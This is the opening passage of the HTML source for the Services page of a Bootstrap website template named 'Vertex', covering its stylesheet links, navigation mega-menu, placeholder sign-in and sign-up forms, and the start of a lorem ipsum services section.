﻿<!DOCTYPE html>

<html>
<head>
    <meta charset="utf-8">
    <title>Vertex - Responsive HTML5 Bootstrap Template</title>
    <meta name="keywords" content="HTML5 Template" />
    <meta name="description" content="Vertex - Responsive HTML5 Template">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <link rel="shortcut icon" type="image/png" href="img/favicon.png" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!-- Web Fonts  -->
    <link href="../fonts.googleapis.com/css.css" rel="stylesheet">

    <!-- Libs CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet" />
    <link href="css/style.css" rel="stylesheet" />
    <link href="css/font-awesome.min.css" rel="stylesheet" />
    <link href="css/streamline-icon.css" rel="stylesheet" />
    <link href="css/header.css" rel="stylesheet" />
    <link href="css/portfolio.css" rel="stylesheet" />
    <link href="css/blog.css" rel="stylesheet" />
    <link href="css/v-animation.css" rel="stylesheet" />
    <link href="css/v-bg-stylish.css" rel="stylesheet" />
    <link href="css/font-icons.css" rel="stylesheet" />
    <link href="css/shortcodes.css" rel="stylesheet" />
    <link href="css/utilities.css" rel="stylesheet" />
    <link href="css/theme-responsive.css" rel="stylesheet" />
    <link href="plugins/aos/aos.css" rel="stylesheet" />
    <link href="plugins/owl-carousel/owl.theme.css" rel="stylesheet" />
    <link href="plugins/owl-carousel/owl.carousel.css" rel="stylesheet" />

    <!-- Current Page CSS -->
    <link href="plugins/rs-plugin/css/settings.css" rel="stylesheet" />

    <!-- Skin -->
    <link rel="stylesheet" href="css/skin/default.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="css/custom.css">
</head>

<body>

    <!--Header-->
    <header id="header" class="header-effect-reveal" data-plugin-options="{'stickyEnabled': true, 'stickyEnableOnBoxed': true, 'stickyEnableOnMobile': true, 'stickyStartAt': 70}">
        <div class="header-body">
            <div class="header-container container">
                <div class="header-row">
                    <div class="header-column justify-content-start">
                        <div class="header-logo">
                            <a href="index.html">
                                <img alt="Vertex" width="130" src="img/logo.png">
                            </a>
                        </div>
                    </div>
                    <div class="header-column justify-content-end">
                        <div class="header-nav header-nav-light-dropdown">
                            <div class="header-nav-main header-nav-main-effect-1 header-nav-main-sub-effect-1">
                                <nav class="collapse">
                                    <ul class="nav flex-column flex-lg-row" id="mainNav">
                                        <li class="dropdown dropdown-mega">
                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">
                                                Home
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content">
                                                        <div class="row">
                                                            <div class="col-lg-3 dropdown-mega-sub-content-block overlay overlay-show overlay-color-primary d-none d-lg-block">
                                                                <span class="top-sub-title text-color-light-2 d-block">THE MOST</span>
                                                                <span class="text-color-light font-weight-bold d-block text-4 mb-2">POWERFUL</span>
                                                                <p class="text-color-light-2">A revolutionary theme trusted by tons of customers</p>
                                                                <a class="btn btn-dark btn-rounded btn-v-3 btn-h-2 content-block-button font-weight-semibold" href="page-services.html#">GET STARTED</a>
                                                            </div>
                                                            <div class="col-lg-3 ml-auto">
                                                                <span class="dropdown-mega-sub-title">MULTI PURPOSE</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item current" href="index.html">Home - Variation 1</a></li>
                                                                    <li><a class="dropdown-item" href="index-2.html">Home - Variation 2</a></li>
                                                                    <li><a class="dropdown-item" href="index-3.html">Home - Variation 3</a></li>
                                                                    <li><a class="dropdown-item" href="index-4.html">Home - Variation 4</a></li>
                                                                    <li><a class="dropdown-item" href="index-5.html">Home - Variation 5</a></li>
                                                                    <li><a class="dropdown-item" href="index-6.html">Home - Variation 6</a></li>
                                                                    <li><a class="dropdown-item" href="index-7.html">Home - Variation 7</a></li>
                                                                    <li><a class="dropdown-item" href="index-8.html">Home - Variation 8</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">PORTFOLIO</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index-9.html">Home - Variation 9 </a></li>
                                                                    <li><a class="dropdown-item" href="index-10.html">Home - Variation 10 <span class="badge badge-warning badge-sm ml-1">Gap Outside</span></a></li>
                                                                    <li><a class="dropdown-item" href="index-11.html">Home - Variation 11</a></li>
                                                                </ul>
                                                                <span class="dropdown-mega-sub-title">Contact Us</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="contact-us.html">Contact Us</a></li>
                                                                    <li><a class="dropdown-item" href="contact-us-2.html">Contact Us 2</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">About Us</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="page-about-us.html">About Us</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-2.html">About Us 2</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-3.html">About Us 3</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-4.html">About Us 4</a></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown dropdown-mega dropdown-mega-style-2">
                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">
                                                Elements
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content container">
                                                        <div class="row">
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 1</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="element-content-carousel.html"><i class="icon-list-1 menu-icon"></i>Content Carousel</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2.html#modal-windows"><i class="icon-outbox-2 menu-icon"></i>Modal Windows</a></li>
                                                                    <li><a class="dropdown-item" href="element-testimonials.html"><i class="icon-chat-2 menu-icon"></i>Testimonials</a></li>
                                                                    <li><a class="dropdown-item" href="element-brands-clients.html"><i class="icon-connection-2 menu-icon"></i>Brands & Clients</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2.html#image-frames"><i class="icon-photo-frame menu-icon"></i>Image Frames</a></li>
                                                                    <li><a class="dropdown-item" href="element-buttons.html"><i class="icon-cursors menu-icon"></i>Buttons<span class="badge badge-warning badge-sm ml-1">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-iconboxes.html"><i class="icon-star-1 menu-icon"></i>Animation & Feature Boxes</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2.html#circle-counters"><i class="icon-heart-plus menu-icon"></i>Circle Counters</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-2.html"><i class="icon-photo-frame menu-icon"></i>Fancy Heading</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2.html#recent-posts"><i class="icon-rss-1 menu-icon"></i>Recent Posts & News</a></li>
                                                                    <li><a class="dropdown-item" href="element-icon-grid.html"><i class="icon-grid menu-icon"></i>Icon Grids</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 2</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index-3.html"><i class="icon-video-camera-2 menu-icon"></i>Video Section</a></li>
                                                                    <li><a class="dropdown-item" href="element-social-icons.html"><i class="icon-link menu-icon"></i>Social Icons</a></li>
                                                                    <li><a class="dropdown-item" href="element-pricing-tables.html"><i class="icon-money menu-icon"></i>Pricing Tables</a></li>
                                                                    <li><a class="dropdown-item" href="element-charts.html"><i class="icon-business-chart-2 menu-icon"></i>Charts <span class="v-menu-item-info">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-progress-bar.html"><i class="icon-type-2 menu-icon"></i>Progress Bars</a></li>
                                                                    <li><a class="dropdown-item" href="element-tabs.html"><i class="icon-window-selection-2 menu-icon"></i>Tab Control</a></li>
                                                                    <li><a class="dropdown-item" href="element-team-member.html"><i class="icon-user-star-1 menu-icon"></i>Team Elements</a></li>
                                                                    <li><a class="dropdown-item" href="element-accordion.html"><i class="icon-credit-card menu-icon"></i>Accordion & Toggles</a></li>
                                                                    <li><a class="dropdown-item" href="element-call-to-actions.html"><i class="icon-bookmark-3 menu-icon"></i>Call To Actions <span class="badge badge-warning badge-sm ml-1">Important</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-process-steps.html"><i class="icon-shear-tool menu-icon"></i>Process Steps</a></li>
                                                                    <li><a class="dropdown-item" href="element-animated-headline.html"><i class="icon-cigarette menu-icon"></i>Animated Headline</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 3</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="element-common.html#gridsystem"><i class="icon-arrange-4-1 menu-icon"></i>Grid System</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#typograpy"><i class="icon-small-caps menu-icon"></i>Typograpy</a></li>
                                                                    <li><a class="dropdown-item" href="element-forms.html"><i class="icon-text menu-icon"></i>Form Elements <span class="badge badge-danger badge-sm ml-1">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#lists"><i class="icon-check-list menu-icon"></i>Lists</a></li>
                                                                    <li class="dropdown-submenu">
                                                                        <a class="dropdown-item dropdown-toggle" href="page-services.html#"><i class="icon-bucket menu-icon"></i> Icons</a>
                                                                        <ul class="dropdown-menu">
                                                                            <li><a class="dropdown-item" href="element-icons.html">Font Awesome Icons</a></li>
                                                                            <li><a class="dropdown-item" href="element-icons-2.html">Streamline Icons</a></li>
                                                                            <li><a class="dropdown-item" href="element-social-icons.html">Social Icons</a></li>
                                                                        </ul>
                                                                    </li>
                                                                    <li><a class="dropdown-item" href="element-common.html#info-messages"><i class="icon-information menu-icon"></i>Info Messages</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#heading-options"><i class="icon-megaphone-1 menu-icon"></i>Heading Options</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#tagline"><i class="icon-inbox-3 menu-icon"></i>Tagline & Info Boxes</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#pagination"><i class="icon-scroll-horizontal-1 menu-icon"></i>Pagination</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#separator-divider"><i class="icon-scissor-1 menu-icon"></i>Separator / Divider</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3 dropdown-mega-sub-content-block d-none d-lg-block">
                                                                <img src="img/logo-white.png" class="img-responsive content-block-image" alt="" width="110" />
                                                                <span class="top-sub-title text-color-light-2 d-block">THE MOST</span>
                                                                <span class="text-color-light font-weight-bold d-block text-4 mb-4">POWERFUL</span>
                                                                <p class="text-color-light-2">A revolutionary theme<br> trusted by tons of<br> customers</p>
                                                                <a class="btn d-inline-block content-block-button text-color-primary font-weight-bold p-0" href="page-services.html#">GET STARTED</a>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">
                                                Features
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#"><i class="icon-check-list menu-icon"></i> Headers</a>
                                                    <ul class="dropdown-menu">
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">Top Bar</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-header-colored-top-bar.html">Default + Colored Top Bar</a></li>
                                                                <li><a class="dropdown-item" href="index-header-top-bar-search.html">Default + Top Bar with Search</a></li>
                                                                <li><a class="dropdown-item" href="index-header-top-bar-button.html">Default + Top Bar with Button</a></li>
                                                            </ul>
                                                        </li>
                                                        <li><a class="dropdown-item" href="index-header-center.html">Center</a></li>
                                                        <li><a class="dropdown-item" href="index-header-logo-between-menu.html">Logo Between Menu</a></li>
                                                        <li><a class="dropdown-item" href="index-header-below-slider.html">Below Slider</a></li>
                                                        <li><a class="dropdown-item" href="index-header-with-borders.html">With Borders</a></li>
                                                        <li><a class="dropdown-item" href="index-header-full-width.html">Full Width</a></li>
                                                        <li><a class="dropdown-item" href="index-6.html">Floating</a></li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">Transparent</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="portfolio-single.html">Transparent</a></li>
                                                                <li><a class="dropdown-item" href="index-8.html">Transparent - Bottom Border</a></li>
                                                                <li><a class="dropdown-item" href="index-header-semi-transparent.html">Semi Transparent</a></li>
                                                                <li><a class="dropdown-item" href="index-11.html">Semi Transparent - Light</a></li>
                                                            </ul>
                                                        </li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">Navbar</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-header-navbar.html">Navbar</a></li>
                                                                <li><a class="dropdown-item" href="index-header-navbar-centered-logo.html">Navbar - Centered Logo</a></li>
                                                            </ul>
                                                        </li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#"><i class="icon-window-2 menu-icon"></i> Navigations</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-navigation-top-line.html">Top Line</a></li>
                                                        <li><a class="dropdown-item" href="index-navigation-stripe.html">Stripe</a></li>
                                                        <li><a class="dropdown-item" href="index-navigation-dark-dropdown.html">Dark Dropdown</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#"><i class="icon-layers menu-icon"></i> Footers</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-404.html#footer">Footer Variation</a></li>
                                                        <li><a class="dropdown-item" href="page-faq.html#footer">Footer Variation 2</a></li>
                                                        <li><a class="dropdown-item" href="page-services.html#footer">Footer Variation 3</a></li>
                                                        <li><a class="dropdown-item" href="index-11.html#footer">Footer Variation 4</a></li>
                                                        <li><a class="dropdown-item" href="feature-footers.html">Footer Variation 5</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#"><i class="icon-arrange-3-5 menu-icon"></i> Page Headers</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-page-header-left-alignment.html">Left Alignment</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-center-alignment.html">Center Alignment</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-right-alignment.html">Right Alignment</a></li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">Colors</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-page-header-color-primary.html">Primary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-secondary.html">Secondary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-tertiary.html">Tertiary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-quaternary.html">Quaternary Color</a></li>
                                                            </ul>
                                                        </li>
                                                        <li><a class="dropdown-item" href="index-page-header-dark.html">Dark</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-parallax.html">Parallax</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-video-background.html">Video Background</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-mini.html">Mini</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#"><i class="icon-board menu-icon"></i> Layout Options</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-10-boxed.html">Boxed</a></li>
                                                        <li><a class="dropdown-item" href="index-10.html">Gap Outside</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle active" href="page-services.html#">
                                                Pages
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#">About Us</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-about-us.html">About Us</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-2.html">About Us 2</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-3.html">About Us 3</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-4.html">About Us 4</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me.html">About Me</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me-2.html">About Me 2</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me-3.html">About Me 3</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#">Contact Us</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="contact-us.html">Contact Us</a></li>
                                                        <li><a class="dropdown-item" href="contact-us-2.html">Contact Us 2</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#">Layouts</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-right-sidebar.html">Right Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-left-sidebar.html">Left Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-left-right-sidebar.html">Left & Right Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-full-width.html">Full width Page</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-meet-team.html">Team</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#">Services</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item current" href="page-services.html">Services</a></li>
                                                        <li><a class="dropdown-item" href="page-services-2.html">Services 2</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#">Login / Register</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-login.html">Login</a></li>
                                                        <li><a class="dropdown-item" href="page-login-2.html">Login 2</a></li>
                                                        <li><a class="dropdown-item" href="page-register.html">Register</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-search-result.html">Search Result</a></li>
                                                <li><a class="dropdown-item" href="page-help.html">Help Page</a></li>
                                                <li><a class="dropdown-item" href="page-author-page.html">Author Page</a></li>
                                                <li><a class="dropdown-item" href="page-pricing.html">Pricing Page</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#">Extra</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-faq.html">FAQ</a></li>
                                                        <li><a class="dropdown-item" href="page-404.html">404 Error</a></li>
                                                        <li><a class="dropdown-item" href="page-privacy.html">Privacy Page</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#">Support</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="changelog.html"><i class="fa fa-terminal"></i>Changelog</a></li>
                                                        <li><a class="dropdown-item" href="theme-plugins.html"><i class="fa fa-star-o"></i>Theme Plugins</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown dropdown-mega dropdown-mega-style-2">
                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">
                                                Portfolio
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content container">
                                                        <div class="row">
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Gallery</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-two-gallery.html">Gallery - 2 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-three-gallery.html">Gallery - 3 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-four-gallery.html">Gallery - 4 Columns</a></li>
                                                                </ul>
                                                                <span class="dropdown-mega-sub-title">Portfolio Variations</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-right-sidebar.html">Right Sidebar</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-left-sidebar.html">Left Sidebar</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Standard</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-two-standard.html">Standard - 2 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-three-standard.html">Standard - 3 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-four-standard.html">Standard - 4 Columns</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Masonry</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-gallery.html">Gallery</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-standard.html">Standard</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-fw.html">Fullwidth Standard</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-fw-2.html">Fullwidth Gallery</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Single</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-single.html">Single</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-slider.html">Slider</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-2.html">Custom</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-gallery.html">Gallery</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-fw.html">Full Width</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-fw-slides.html">Full Width Slides</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-extended.html">Extended <span class="badge badge-warning badge-sm ml-1">Showcase</span> </a></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="page-services.html#">
                                                Blog
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li><div class="menu-sm-info">Perfect Design</div></li>
                                                <li><a class="dropdown-item" href="blog-standard-sidebar.html"><i class="icon-list-1 menu-icon"></i> Blog Standard</a></li>
                                                <li><a class="dropdown-item" href="blog-mini-sidebar.html"><i class="icon-list-2 menu-icon"></i> Blog Small</a></li>
                                                <li><a class="dropdown-item" href="blog-masonry.html"><i class="icon-arrange-4-1 menu-icon"></i> Blog Masonry</a></li>
                                                <li><a class="dropdown-item" href="blog-masonry-fw.html"><i class="icon-arrange-5 menu-icon"></i> Blog Fullwidth Masonry</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-services.html#"><i class="icon-link menu-icon"></i>  Blog Posts</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="blog-standard-post.html">Standard Post</a></li>
                                                        <li><a class="dropdown-item" href="blog-full-width-post.html">Full Width Post</a></li>
                                                        <li><a class="dropdown-item" href="blog-standard-post-2.html">Standard Post - Modern</a></li>
                                                        <li><a class="dropdown-item" href="blog-full-width-post-2.html">Full Width Post - Modern</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>

                                        <li class="dropdown dropdown-mega dropdown-mega-signin signin ml-lg-3" id="headerAccount">
                                            <a class="dropdown-item pl-lg-4" href="page-login.html">Sign In</a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content">
                                                        <div class="row">
                                                            <div class="col">
                                                                <div class="signin-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Sign In</h2>
                                                                    <form action="page-login.html" id="frmSignIn" method="post">
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="signInEmail" placeholder="Username" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col">
                                                                                <input type="password" value="" class="form-control" name="password" id="signInPassword" placeholder="Password" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col">
                                                                                <div class="form-check checkbox-custom checkbox-default">
                                                                                    <input class="form-check-input" type="checkbox" id="signInRemember">
                                                                                    <label class="form-check-label" for="signInRemember">
                                                                                        Remember me
                                                                                    </label>
                                                                                </div>
                                                                            </div>
                                                                            <div class="form-group col text-right">
                                                                                <a href="page-services.html#" id="headerRecover" class="forgot-pw text-color-dark d-block">Forgot password?</a>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-services.html#" id="headerSignUp" class="text-color-primary pl-0">Sign Up Now!</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0"><i class="fa fa-lock"></i> SIGN IN</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                                <div class="signup-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Sign Up</h2>
                                                                    <form action="page-services.html#" id="frmSignUp" method="post">
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="text" value="" class="form-control" name="name" id="signUpName" placeholder="Full Name" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="signUpEmail" placeholder="E-mail" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row mb-3">
                                                                            <div class="form-group col">
                                                                                <input type="password" value="" class="form-control" name="password" id="signUpPassword" placeholder="Password" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-services.html#" id="headerSignIn" class="text-color-primary pl-0">Have an account?</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0">SIGN UP</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                                <div class="recover-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Reset my Password</h2>
                                                                    <form action="page-services.html#" id="frmResetPassword" method="post">
                                                                        <div class="form-row mb-4">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="resetPasswordEmail" placeholder="E-mail" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-services.html#" id="headerRecoverCancel" class="text-color-primary pl-0">Have an account?</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0">SUBMIT</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                    </ul>
                                </nav>
                            </div>
                            <div class="header-button d-none d-sm-flex ml-3">
                                <a class="btn v-btn standard lightgrey sf-icon-reveal mb-0 mr-0" href="https://wrapbootstrap.com/theme/express-business-website-template-WB0TR1711" target="_self">
                                    <i class="icon-cart-4"></i><span class="text text-uppercase">Buy Me</span>
                                </a>
                            </div>
                            <button class="header-btn-collapse-nav ml-3" data-toggle="collapse" data-target=".header-nav-main nav">
                                <span class="hamburguer">
                                    <span></span>
                                    <span></span>
                                    <span></span>
                                </span>
                                <span class="close">
                                    <span></span>
                                    <span></span>
                                </span>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!--End Header-->

    <div role="main" class="main">

        <section class="page-header">
            <div class="container">
                <div class="row align-items-center">
                    <div class="col-md-8 text-left">
                        <span class="tob-sub-title text-color-primary d-block">OUR BEST FEATURES</span>
                        <h1>Service</h1>
                        <p class="lead">Lorem ipsum dolor sit amet, consectetur elit.</p>
                    </div>
                    <div class="col-md-4">
                        <ul class="breadcrumb justify-content-start justify-content-md-end mb-0">
                            <li><a href="index.html">Pages</a></li>
                            <li class="active">Service</li>
                        </ul>
                    </div>
                </div>
            </div>
        </section>

        <div class="v-page-wrap no-bottom-spacing">

            <div class="container">
                <div class="row">
                    <div class="col-sm-4">
                        <div class="noframe"  data-aos="fade-up" data-aos-delay="200">

                            <figure class="clearfix">
                                <img src="http://bootstraptemplates.net/vertex/img/mix/07.jpg" class="attachment-full responsive" />
                                <figcaption class="image-caption">
                                    <h3>Professional Solutions</h3>
                                    <p>
                                        Cras nibh odio, dictum ut tortor auctor, vulputate condimentum mi. Mauris non porta mi, vitae viverra magna. Phasellus eleifend interdum mattis.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More →</a>
                                </figcaption>
                            </figure>
                        </div>
